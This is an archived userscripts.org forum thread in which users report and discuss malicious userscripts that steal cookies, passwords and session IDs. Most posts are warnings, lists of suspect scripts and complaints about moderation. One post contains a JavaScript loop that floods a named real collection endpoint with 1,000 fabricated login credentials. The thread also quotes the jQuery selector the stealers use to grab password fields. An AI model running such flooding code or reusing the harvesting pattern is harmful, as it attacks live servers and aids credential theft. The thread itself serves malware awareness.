THIS IS A STATIC MIRROR OF USERSCRIPTS.ORG - LOGINS DO NOT WORK

Cookie Stealing Scripts

in Userscripts.org discussion
Subscribe to Cookie Stealing Scripts 209 posts, 115 voices



sizzlemctwizzle Scriptwright
FirefoxMacintosh

Daren wrote:
#1 So after 2+ years of posting about these problems, the root problem still exists?
The problem will always exist. The only solution would be setting up a review system like the one mozilla does for addons, but that would be more hassle than its worth. Your best option is to trust the community to report scripts that are malicious. Also you could just only install popular scripts(lots of downloads, fans, high ratings, and discussions) since they are less likely to be malicious. Also if a scriptwright has one of these popular scripts, it's probably safe to assume his other scripts are safe. Just be a vigilant/smart user basically.
Daren wrote:
cookie-stealing still available for download
Yeah I don't know why the one's that have been identified haven't been removed.

 
used-car-parts User
FirefoxWindows

Newbie here. The review system sounds good. I've seen several good sites do that and it's a great way to let people know the pros and cons of the script.

 
donovanagano... User
FirefoxWindows

ghhhhhhhhhhhb

 
Marti Scriptwright
FirefoxX11

This user in this script claims stealing of site related passwords. So far from what I can tell none of the scripts posted by this user are his and may be "dirty".

 
Luzifull22 User
ChromeWindows

yess OL Thankss!

 
Marti Scriptwright
FirefoxX11

This user in this script with this version includes a @require to a questionable script with this version that appears to compromise identity and privacy by canvasing a google page that has been provided by Google, Inc. specifically for this purpose. Used in combination with [this addon](https://addons.mozilla.org/en-US/firefox/addon/Sticklet/) on AMO along with Greasemonkey. This "feature" (a complicated web-bug) is undocumented on all of the script/add-on homepages.

Jesse Andrews wrote:
I'm putting up a banner to warn people that newly uploaded/updated scripts should be put under extra scrutiny.
I recommend this even for older scripts too... good advice! :)

 
Marti Scriptwright
FirefoxX11

SuperCanan posted this malware with this version.
Script sends off hotmail/live and facebook user/password to a 3rd party by eavesdropping on login pages.

 
Marti Scriptwright
FirefoxX11

Melkor posted this malware with initial version.
Script takes sessionid data and sends it off to a 3rd party. here


La Larva posted this malware with this version
This one also has similar review... call to server doesn't appear to be present but sessionid does appear to be sent elsewhere.

These two will probably need some indepth examination.

 
ameboide Scriptwright
FirefoxWindows

Marti wrote:
SuperCanan posted this malware with this current version.
Script sends off hotmail/live and facebook user/password to a 3rd party by eavesdropping on login pages.
Good to see that the script was removed, but why wasn't the user banned? If distributing obvious malware isn't worth an instant ban, what is? And not only that, but just a quick look at his other scripts shows that all of them do the same (I presume it's even the same code that was present in the deleted script)

 
Jefferson Scher Scriptwright
FirefoxWindows

3ICE posted about another one:

Someone stole my script and inserted malicious code into it. 56 people affected.
https://userscripts-mirror.org/topics/94059

Suspect script: Youtube Link OptimizerX
https://userscripts-mirror.org/scripts/show/118278

I added a couple of discussions there.

 
Cletus Scriptwright
FirefoxWindows

Jefferson Scher wrote:
3ICE posted about another one
Seems like it is more than just that one.
Here is a customized search that catches a total of 31 scripts that have that chunk of code in it: https://userscripts-mirror.org/search...

Edit: here are clickable links to make it a bit easier to keep track of.

https://userscripts-mirror.org/scripts/review/117369
https://userscripts-mirror.org/scripts/review/117528
https://userscripts-mirror.org/scripts/review/117539
https://userscripts-mirror.org/scripts/review/117694
https://userscripts-mirror.org/scripts/review/118060
https://userscripts-mirror.org/scripts/review/118063
https://userscripts-mirror.org/scripts/review/118114
https://userscripts-mirror.org/scripts/review/118137
https://userscripts-mirror.org/scripts/review/118139
https://userscripts-mirror.org/scripts/review/118141
https://userscripts-mirror.org/scripts/review/118142
https://userscripts-mirror.org/scripts/review/118143
https://userscripts-mirror.org/scripts/review/118144
https://userscripts-mirror.org/scripts/review/118146
https://userscripts-mirror.org/scripts/review/118150
https://userscripts-mirror.org/scripts/review/118156
https://userscripts-mirror.org/scripts/review/118158
https://userscripts-mirror.org/scripts/review/118161
https://userscripts-mirror.org/scripts/review/118163
https://userscripts-mirror.org/scripts/review/118186
https://userscripts-mirror.org/scripts/review/118269
https://userscripts-mirror.org/scripts/review/118274
https://userscripts-mirror.org/scripts/review/118278
https://userscripts-mirror.org/scripts/review/118305
https://userscripts-mirror.org/scripts/review/118308
https://userscripts-mirror.org/scripts/review/118313
https://userscripts-mirror.org/scripts/review/118314
https://userscripts-mirror.org/scripts/review/118476
https://userscripts-mirror.org/scripts/review/118477
https://userscripts-mirror.org/scripts/review/118479
https://userscripts-mirror.org/scripts/review/118485

 
sizzlemctwizzle Scriptwright
FirefoxWindows

@Cletus

You link doesn't work. Here's a [Google search](http://www.google.com/search?q=%22http:%2F%2Ftotalfi%22+site%3Ahttps%3A%2F%2Fuserscripts-mirror.org%2Fscripts%2Freview%2F&pbx=1&oq=%22http:%2F%2Ftotalfi%22+site%3Ahttps%3A%2F%2Fuserscripts-mirror.org%2Fscripts%2Freview%2F) that returns 31 results.

 
Jefferson Scher Scriptwright
FirefoxWindows

This is why everyone should run NoScript. (If you can tolerate constantly investigating and approving things. Maybe even if you can't...)

 
Cletus Scriptwright
FirefoxWindows

sizzlemctwizzle wrote:
You link doesn't work.
Whoops, fixed.

 
Marti Scriptwright
FirefoxX11

ameboide wrote:
Good to see that the script was removed, but why wasn't the user banned?
It is possible that the respective users deleted their scripts too... but as far as banning goes related to these... this is newer territory... I don't know what the general consensus on appropriate actions is yet... till then I'll report and recheck occasionally.

 
cqrt Scriptwright
ChromeWindows

This script caught my attention as it is using, verbatim, the description for my popular Google Reader Sanity userscript. It's called Google Reader by user vdk and it's source code reveals that it is the complete uncompressed source of jQuery and nothing else except for some additional foreign code at the bottom. I'm aware of the totalfilehosters.co.uk cookie stealing userscript, but this seems to be something different, loading code from '[http://aspspider.net](http://aspspider.net/)' which is 'free' ASP hosting, can anybody identify what it's doing? The same author also has the same code in this script.

 
Jefferson Scher Scriptwright
FirefoxWindows

cqrt wrote:
... I'm aware of the totalfilehosters.co.uk cookie stealing userscript, but this seems to be something different, loading code from '[http://aspspider.net](http://aspspider.net/)' which is 'free' ASP hosting, can anybody identify what it's doing?
I don't use jQuery, but this syntax should find all of the <input type="password"> in the document:

$(":password")

That, plus posting it to some site other than the site the user is visiting, is all I think one needs to know about this script!

I posted a Discussion on each of the two scripts, and voted it harmful. I suppose for greater visibility, they need bad reviews...

 
Marti Scriptwright
FirefoxX11

vdk posted this malware with this version.
Script needlessly runs on all pages and potentially steals DOM inserted user/passes.


vdk posted this malware with this version.
Script needlessly runs on all pages and potentially steals DOM inserted user/passes.

 
ameboide Scriptwright
FirefoxWindows

Jefferson Scher wrote:
(...)
I posted a Discussion on each of the two scripts, and voted it harmful. I suppose for greater visibility, they need bad reviews...
No, they need to be deleted and the user(s) permanently banned.

I really don't understand what's to ponder about this. Spammers get promptly (sort of) banned for posting useless links in the forums; yet users who maliciously release obvious malware, steal cookies and passwords from unaware people, and even do so disguising it as other people's scripts, receive no sanction at all, and their harmful scripts remain there to be installed.
Maybe if this thread was hidden deep inside an active forum there would be a reason for not taking action, but this is the only sticky thread besides the spam thread (that does receive some attention) in the main forum of the site, which receives like 3 posts a week besides spam and complaints about spam, so it's not that hard to notice...

 
Jefferson Scher Scriptwright
FirefoxWindows

ameboide wrote:
Jefferson Scher wrote:
(...)
I posted a Discussion on each of the two scripts, and voted it harmful. I suppose for greater visibility, they need bad reviews...
No, they need to be deleted and the user(s) permanently banned.
Yes, that's true. I was referring to what we non-admins could do ourselves.

 
ameboide Scriptwright
FirefoxWindows

I'll just leave this here...

var c = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXTZabcdefghiklmnopqrstuvwxyz";
var cl = c.length;
function rand() {
	var l = 6 + Math.random()*6;
	var rand = '';
	for (var i=0; i<l; i++) rand += c.charAt(Math.random() * cl);
	return rand;
}

var hosts = ["www.facebook.com", "twitter.com", "mail.google.com"];
var xmlHttp = new XMLHttpRequest();
var n = 1000;
while(n--){
	var userName = rand();
	var passWord = rand();
	var hostLocation = hosts[Math.floor(Math.random()*3)];
	xmlHttp.open("POST","http://aspspider.net/abc123abc/Default.aspx?Account=" + "host: " + hostLocation + "     " + "username: " + userName + "     " + "password: " + passWord, false);
	xmlHttp.send();
}

 
Marti Scriptwright
FirefoxX11

@ameboide,

I understand your concern quite well. You need to give the other admins time to investigate and if you reread this post you might understand a little bit more about identity theft. I don't have all the necessary time to check every post and script on USO myself but when cqrt posted the reviews I caught it immediately and did my part... the more appropriate attention that is drawn to an issue the more the community can interact with it so the appropriate people can make an informed decision. We all can't be online 24x7 so it is a teamwork effort and some of us only get paid for our day jobs. :P ;)

I've already been seeing cookies altered but not transmitted as of late and some of those scripts are valid. uso - Count Issues for example is a cautionary script notification system to alert a potential end-user installer that there MIGHT be an issue... sometimes there isn't.

Assuming here that you are using Greasefire... I would strongly suggest that you don't click its native install button (This is one my pet peeves with Greasefire but I don't foresee them changing it anytime soon unfortunately.) and go to one of the other links in the browser window that it brings up. This should kick you to the actual browser content window instead so you can review it. :)

 
Jawz74 Scriptwright
ChromeWindows

Hi,
This script (https://userscripts-mirror.org/scripts/show/119339) is sending game data to another location than the game server.
Please remove it. Thanks.

@Marti : Concerning the script posted by La Larva, the "DOA Power tool by Teamwork" is using the game server URL taken from the flash parameters to send the requests. In the script, there's only one location where you can find a "new XMLHttpRequest" and the URL used is always composed with the game sever URL. No other request is sent to another server.

Regards,

 
Marti Scriptwright
FirefoxX11

3lch1M4n posted this malware with this version.
Pretty obvious by the @description and sends user/pass data off to a third party.

 
pearlheartgtr User
FirefoxWindows

This script, https://userscripts-mirror.org/scripts/show/117369 also started a Google Redirect fiasco with adf.ly every time I clicked on something in a search.